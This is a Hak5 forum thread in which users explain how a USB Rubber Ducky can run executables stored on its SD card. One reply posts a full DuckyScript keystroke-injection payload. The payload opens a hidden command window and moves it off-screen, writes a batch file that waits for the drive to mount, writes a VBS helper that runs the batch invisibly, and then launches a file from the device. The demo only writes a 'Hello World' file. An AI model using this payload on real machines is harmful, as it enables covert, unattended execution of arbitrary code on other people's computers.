[Question] Is it Possible to run .exes?

[blacblu]

Is it possible to store data (.exe and .dll) on the Rubber Ducky (or the SD card) and copy this data to a specific folder and run the .exe?

[no42]

Yes - Look at Twin Duck Firmware (c_duck_v2.hex), it can be executed straight from the HID payload.

There should be info in the forums, Overwraith has some demo code somewhere?

Edited February 5, 2013 by midnitesnake

[blacblu]

Do you have any tutorials on this approach, so I can make sure of the reliability before buying the Rubber Ducky?

[no42]

Information on the PoC (before Xmas) is here: http://forums.hak5.org/index.php?/topic/28162-introducing-twin-duck-firmware/?p=214115

Now you can use DuckyScript to deliver a HID payload rather than the previous hard-coded executable.

You can use the following code to search for the drive via label

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

then execute a binary on the ducky by

%myd%/my_executable.exe

or

%myd%/my_batfile.bat

Other Info is on the website, in my signature.

[overwraith]

The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. I have been having some problems with delays so I went a little overboard with the "DELAY 25" codes. The name of the file that is run can be changed to .exe, I am just having it run a batch for testing purposes. The line that says "STRING %myd%\myEXE.bat" is the line that executes the executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER

The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt" which will probably be in "C:\Windows\system32".

REM Message.txt
echo Hello Wolrd!!!
echo Hello World!!! > Message.txt
 

P.S. when is the online payload generator getting back online!!! I need the REPEAT command!!!! You will need to replace REPEAT in the beginning of the code with 100 repeats, so copy paisty.

Edited February 8, 2013 by overwraith